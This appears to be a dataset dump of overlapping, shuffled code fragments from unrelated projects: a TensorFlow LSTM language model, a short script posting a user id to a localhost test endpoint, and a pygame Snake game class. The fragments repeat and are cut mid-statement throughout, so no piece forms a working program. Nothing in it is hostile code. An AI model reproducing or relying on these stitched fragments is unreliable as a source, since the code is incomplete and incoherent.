tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out,", "logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax", "= _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits,", "_attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax", "trainer # todo: add GPU support to trainer # todo: reset lstm hidden", "trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients,", "* hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer,", ":param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss,", "cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with", "= non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients,", "logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param", "2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x:", "pull out the most likely words :param logits: :param id_to_word_lookup_table: :param k: :param", "char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers =" ]
[ "-*- coding: utf-8 -*- from requests import post r = post(url='http://127.0.0.1:5000/testsuit',data={'userId':'Robert'}) print(r.status_code) print(r.json())", "# -*- coding: utf-8 -*- from requests import post r = post(url='http://127.0.0.1:5000/testsuit',data={'userId':'Robert'}) print(r.status_code)", "<reponame>simulency/Robot_Executor_Demo # -*- coding: utf-8 -*- from requests import post r = post(url='http://127.0.0.1:5000/testsuit',data={'userId':'Robert'})" ]
[ "move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block", "== 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block =", "previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1 and next_block.x", "#Snake.is_moving = True self.direction = vec def add_block(self) -> None: self.new_block = True", "len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] +", "pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0)", "= self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1):", "== True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if", "self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right =", "self.new_block = False self.slowed = False def draw_snake_object(self) -> None: for index, block", "self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head", "[Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False", "if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body =", "next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x ==", "elif previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1 and", "self.direction) self.body = body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0]", "self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1 or previous_block.y ==", "screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction =", "sys import time from pygame.math import Vector2 from .config import FPS, xSize, ySize,", "draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface:", "Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1]", "self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def", "None: for index, block in enumerate(self.body): # rect for positioning x_pos = int(block.x", "== 1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif", "tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif", "== False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:]", "and next_block.y == 1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl,", "+ self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) ->", "self.direction = vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self) ->", "else: Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy = self.body[:-1]", "= self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False", "if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy", "< (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction)", "self.body = body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] +", "CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object): is_moving =", "index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block", "block next_block = self.body[index - 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical,", "from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw", "and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model", "# Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2]", "- self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0):", "update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail", "Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation", "body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True", "def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if", "False def draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect for", "if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else:", "self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') #", "self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl =", "for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect", "block_rect) elif previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1", "body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self,", "cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) #", "== Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif", "next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics()", "self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block = self.body[index -", "-1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1 or previous_block.y", "Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction =", "= vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface:", "cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object): is_moving", "1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x", "= self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation", "self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) ->", "== Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] -", "== next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x", "tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down", "= False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec", "xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake", "Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation", "False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving", "body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0:", "self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:]", "and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y ==", "or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x ==", "def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self)", "1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object()", "False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def", "0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index", "cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object):", "or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) ->", "previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y ==", "None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation =", "time from pygame.math import Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number,", "def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0):", "next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1", "self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if", "Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False", "Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self)", "pygame, sys import time from pygame.math import Vector2 from .config import FPS, xSize,", "self.direction = Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) -> None:", "from pygame.math import Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING", "from .eatable.cake import Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface)", "head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up", "elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail =", "self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block = False body_copy", "False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0,", "1 and next_block.y == -1 or previous_block.y == -1 and next_block.x == 1:", "body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False", "block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect)", "screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) ->", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png')", "block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face if", "import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake", "pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png') self.body_bl", "Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture()", "Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) -> None: for index,", "if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block =", "0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy", "-1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == -1:", "body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec)", "elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y", "pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left", "Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False else: body_copy =", "-1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x", "previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1 and next_block.x", "self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head", "index, block in enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size)", "cell_size, cell_size) # what direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect)", "-> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block", "next_block.y == -1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect)", "Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self)", "-> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block ==", "None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block =", "self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False", "pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up", "* cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size)", "class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body", "previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if", "= self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation", "== 1 or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def", "Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or", "= False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done()", "= [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed =", "or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x ==", "body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block =", "self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical =", "len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block", "= False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:]", "self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if", "== Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif", "== Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def", "== next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y == -1", "Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import", "= pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png')", "# Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down =", "== 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics()", "None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True:", "= Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self) -> None: for", "= int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos,", "pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down", "self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation ==", "-> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) -> None: self.new_block", "-> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail =", "draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect for positioning x_pos", "self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') #", "elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1]", "pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal", "pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') #", "1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: # Update", "import Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None:", "-1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y", "self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False def", "Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation", "vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) -> None:", "ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import Cake class", "else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body =", "= self.body[index - 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif", "self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1): self.tail", "if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else:", "self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def", "if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail =", "body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body", "self.body[index - 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y", "= int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction", "head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right", "= self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) <", "cell_size) # what direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif", "= self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1):", "self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) ->", "== -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and", "elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head =", "y_pos, cell_size, cell_size) # what direction is tha face if index == 0:", "index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] -", "self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions", "Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction", "Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png')", "elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail =", "pygame.math import Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from", "== -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1 or", "-> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation", "what direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index ==", "import time from pygame.math import Vector2 from .config import FPS, xSize, ySize, cell_size,", "self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body =", "pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down", "x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos,", "= pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png')", "previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1", "self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation", "True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png')", "+ self.direction) self.body = body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0,", "= False self.slowed = False def draw_snake_object(self) -> None: for index, block in", "pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face if index ==", "in enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size) y_pos =", "-1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x", "1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y", "body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving =", "next_block = self.body[index - 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect)", "def draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect for positioning", "positioning x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect =", "1 and next_block.y == 1 or previous_block.y == 1 and next_block.x == 1:", "int(block.x * cell_size) y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size,", "Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png') self.body_bl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_unten.png')", "import pygame, sys import time from pygame.math import Vector2 from .config import FPS,", "previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1", "== 1 and next_block.y == -1 or previous_block.y == -1 and next_block.x ==", "== 1 and next_block.y == 1 or previous_block.y == 1 and next_block.x ==", "= pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz", "= body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block =", "tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right", "and next_block.y == 1 or previous_block.y == 1 and next_block.x 